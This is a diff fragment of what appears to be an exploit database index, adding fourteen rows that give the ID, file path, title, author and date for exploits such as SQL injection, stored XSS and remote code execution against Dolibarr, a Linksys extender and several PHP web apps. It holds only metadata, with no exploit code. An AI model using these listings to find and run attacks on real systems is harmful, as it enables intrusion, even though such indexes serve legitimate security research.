 49267,exploits/php/webapps/49267.txt,"PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection",2020-12-16,"Frederic ADAM",webapps,php,
 49268,exploits/php/webapps/49268.txt,"Seotoaster 3.2.0 - Stored XSS on Edit page properties",2020-12-16,"Hardik Solanki",webapps,php,
+49269,exploits/php/webapps/49269.py,"Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)",2020-12-17,"Yilmaz Degirmenci",webapps,php,
+49270,exploits/hardware/webapps/49270.py,"Linksys RE6500 1.0.11.001 - Unauthenticated RCE",2020-12-17,RE-Solver,webapps,hardware,
+49271,exploits/php/webapps/49271.txt,"Content Management System 1.0 - 'First Name' Stored XSS",2020-12-17,Zhaiyi,webapps,php,
+49272,exploits/php/webapps/49272.txt,"Content Management System 1.0 - 'email' SQL Injection",2020-12-17,Zhaiyi,webapps,php,
+49273,exploits/php/webapps/49273.txt,"Content Management System 1.0 - 'id' SQL Injection",2020-12-17,Zhaiyi,webapps,php,
+49274,exploits/php/webapps/49274.txt,"Medical Center Portal Management System 1.0 - 'id' SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49275,exploits/php/webapps/49275.txt,"Customer Support System 1.0 - _First Name_ & _Last Name_ Stored XSS",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49276,exploits/php/webapps/49276.txt,"Customer Support System 1.0 - 'id' SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49277,exploits/php/webapps/49277.txt,"Online Tours & Travels Management System 1.0 - _id_ SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49278,exploits/php/webapps/49278.txt,"Interview Management System 1.0 - Stored XSS in Add New Question",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49279,exploits/php/webapps/49279.txt,"Interview Management System 1.0 - 'id' SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49280,exploits/php/webapps/49280.txt,"Employee Record System 1.0 - Multiple Stored XSS",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49281,exploits/php/webapps/49281.txt,"PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)",2020-12-17,"Andrea Intilangelo",webapps,php,
+49282,exploits/php/webapps/49282.txt,"Victor CMS 1.0 - Multiple SQL Injection (Authenticated)",2020-12-17,"Furkan Göksel",webapps,php,